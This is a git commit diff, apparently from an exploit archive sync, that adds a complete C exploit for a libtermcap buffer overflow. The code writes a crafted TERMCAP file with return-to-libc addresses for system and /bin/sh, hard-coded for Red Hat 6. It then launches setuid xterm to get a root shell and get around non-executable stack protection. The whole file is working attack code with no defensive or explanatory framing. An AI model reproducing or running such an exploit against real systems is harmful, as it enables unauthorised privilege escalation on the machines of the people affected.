From 5d3573ef7a109ee70416fe94db098fe6a769a798 Mon Sep 17 00:00:00 2001 From: SkyperTHC Date: Tue, 3 Mar 2026 06:28:55 +0000 Subject: packetstorm sync --- exploits/7350termcap/libtermcapsploit.c | 61 +++++++++++++++++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 exploits/7350termcap/libtermcapsploit.c (limited to 'exploits/7350termcap/libtermcapsploit.c') diff --git a/exploits/7350termcap/libtermcapsploit.c b/exploits/7350termcap/libtermcapsploit.c new file mode 100644 index 0000000..893ca0e --- /dev/null +++ b/exploits/7350termcap/libtermcapsploit.c @@ -0,0 +1,61 @@ +#include +#include +#include +#include +#include + +// yet another lame libtermcap<2.0.8-15 sploit by typo@scene.at (libc jumpback) +// only made this to bypass nonexecutable stack patches - http://teso.scene.at/ + +// Redhat 6 offsets (i only needed these) +int sys = 0x401bca40; // system +int sh = 0x4025ab12; // /bin/sh +int exi = 0x4020b910; // _exit +int ran = 0x401b9928; // random offset in libc +int eip = 2136; +#define fil "/tmp/teso_termcap" +#define xte "/usr/X11R6/bin/xterm" +#define entry "xterm|" + +int main(int argc, char **argv) { + char *buf; + int fd, buflen; + + argv++; + + if (argc>1) // dec,!hex args + sys = atoi(*(argv++)); + if (argc>2) + sh = atoi(*(argv++)); + if (argc>3) + exi = atoi(*(argv++)); + if (argc>4) + eip = atoi(*(argv++)); + + buflen = eip + 20; + + buf = (char *) malloc(buflen); + memset(buf, 'x', buflen); + buf[buflen] = 0; + + memcpy(buf, entry, strlen(entry)); + memcpy (buf+buflen-4,":\\y",3); + + memcpy(buf+eip,&sys,4); + memcpy(buf+eip+4,&exi,4); + memcpy(buf+eip+8,&sh,4); + memcpy(buf+eip+12,&ran,4); + + if ( (fd = open(fil, O_WRONLY|O_CREAT|O_TRUNC, "644"))<0) { + perror("cannot create file"); + exit(EXIT_FAILURE); + } + + write(fd,buf,buflen); + close(fd); + free(buf); + + setenv("TERMCAP", fil, 1); + execl(xte, "xterm", NULL); + exit(EXIT_SUCCESS); +} -- cgit v1.3